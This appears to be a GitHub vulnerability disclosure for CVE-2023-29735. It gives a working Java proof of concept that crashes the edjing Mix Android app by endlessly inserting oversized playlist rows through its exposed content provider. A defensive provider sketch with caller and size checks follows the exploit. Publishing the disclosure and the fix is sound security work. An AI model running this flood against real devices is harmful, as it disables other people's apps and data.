CVE-2023-29735: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs
An issue found in edjing Mix v.7.09.01 for Android allows a local attacker to cause a denial of service via the database files.
Denial of Service exists in edjing Mix (CVE-2023-29735)
Vendor: MWM (http://www.edjing.com/)
Affected product: edjing Mix (com.edjing.edjingdjturntable)
Version: 7.09.01
Download link: https://play.google.com/store/apps/details?id=com.edjing.edjingdjturntable
Description of the vulnerability for use in the CVE: An issue found in edjing Mix v.7.09.01 for Android allows a local attacker to cause a denial of service via the database files.
PoC:
```java
import android.content.ContentResolver;
import android.content.ContentValues;
import android.net.Uri;
import java.util.Random;

// Both methods are members of a Context subclass such as an Activity.
public void attack() {
    int num = 2;
    while (true) {
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        String randomString = getRandomString(52);     // generated but never used
        String randomString2 = getRandomString(5120);  // 5120-character playlist name
        Uri uri = Uri.parse("content://com.edjing.edjingdjturntable/playlist");
        ContentValues contentValues = new ContentValues();
        contentValues.put("playlist_id", num);
        contentValues.put("playlist_date_modified", 1314234);
        contentValues.put("playlist_date_added", 123456);
        contentValues.put("playlist_state", 0);
        contentValues.put("playlist_name", randomString2);
        // Each iteration adds one more oversized row to the playlist table.
        contentResolver.insert(uri, contentValues);
        num++;
    }
}

// Builds a random alphanumeric string of the requested length.
public static String getRandomString(int length) {
    String str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    Random random = new Random();
    StringBuffer sb = new StringBuffer();
    for (int i = 0; i < length; i++) {
        int number = random.nextInt(62);
        sb.append(str.charAt(number));
    }
    return sb.toString();
}
```
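For the defensive side, the sketch below (an added example, not code from the original page or from edjing Mix) shows a provider that would refuse the inserts in the PoC: it checks the caller's UID, caps the length of `playlist_name` and caps the row count. The class name `PlaylistProvider`, the `playlists.db` file, the reduced two-column schema and both limits are assumptions.

```java
import android.content.ContentProvider;
import android.content.ContentUris;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.DatabaseUtils;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.net.Uri;
import android.os.Binder;
import android.os.Process;

// Hypothetical provider: class, table and limits are assumptions, not edjing Mix code.
public class PlaylistProvider extends ContentProvider {
    private static final int MAX_NAME_LENGTH = 128;  // assumed cap on playlist_name
    private static final long MAX_PLAYLISTS = 1000;  // assumed cap on stored rows
    private SQLiteOpenHelper helper;
    @Override public boolean onCreate() {
        helper = new SQLiteOpenHelper(getContext(), "playlists.db", null, 1) {
            @Override public void onCreate(SQLiteDatabase db) {
                db.execSQL("CREATE TABLE playlist (playlist_id INTEGER PRIMARY KEY, playlist_name TEXT NOT NULL)");
            }
            @Override public void onUpgrade(SQLiteDatabase db, int oldV, int newV) { }
        };
        return true;
    }
    // Reject callers from other apps, even if the provider is exported by mistake.
    private void enforceOwnApp() {
        if (Binder.getCallingUid() != Process.myUid()) throw new SecurityException("caller is not the owning app");
    }

    @Override public Uri insert(Uri uri, ContentValues values) {
        enforceOwnApp();
        String name = values == null ? null : values.getAsString("playlist_name");
        if (name == null || name.isEmpty() || name.length() > MAX_NAME_LENGTH)
            throw new IllegalArgumentException("playlist_name missing or too long");
        SQLiteDatabase db = helper.getWritableDatabase();
        if (DatabaseUtils.queryNumEntries(db, "playlist") >= MAX_PLAYLISTS)
            throw new IllegalStateException("playlist limit reached");
        ContentValues row = new ContentValues();  // copy only vetted columns; the id is assigned by SQLite
        row.put("playlist_name", name);
        long id = db.insert("playlist", null, row);
        return id < 0 ? null : ContentUris.withAppendedId(uri, id);
    }
    // The remaining operations are closed to other apps as well; update is not offered in this sketch.
    @Override public Cursor query(Uri u, String[] p, String s, String[] a, String o) { enforceOwnApp(); return helper.getReadableDatabase().query("playlist", p, s, a, null, null, o); }
    @Override public int update(Uri u, ContentValues v, String s, String[] a) { throw new UnsupportedOperationException(); }
    @Override public int delete(Uri u, String s, String[] a) { enforceOwnApp(); return helper.getWritableDatabase().delete("playlist", s, a); }
    @Override public String getType(Uri u) { return null; }
}
```

Declaring the provider with `android:exported="false"` in the manifest is the primary control; the UID check and size limits are defence in depth for the case where the export flag is wrong.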